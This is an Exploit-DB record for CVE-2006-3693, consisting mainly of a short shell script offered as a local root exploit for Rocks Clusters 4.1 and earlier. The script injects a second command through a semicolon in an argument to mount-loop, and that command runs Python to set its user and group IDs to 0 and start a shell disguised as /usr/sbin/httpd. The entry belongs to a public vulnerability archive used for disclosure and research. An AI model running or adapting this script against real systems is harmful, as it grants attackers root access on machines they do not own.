Rocks Clusters <= 4.1 mount-loop Local Root Exploit

2006-07-15T00:00:00
ID EDB-ID:2016
Type exploitdb
Reporter Xavier de Leon
Modified 2006-07-15T00:00:00

Description

Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit. CVE-2006-3693. Local exploit for linux platform

                                        
                                            #!/bin/sh
##############################################################################
##  rocksmountdirty.sh: Rocks release &lt;=4.1 local root exploit
##  make sure 'mount-loop' is in your path for this to work.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters &lt;=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"

# milw0rm.com [2006-07-15]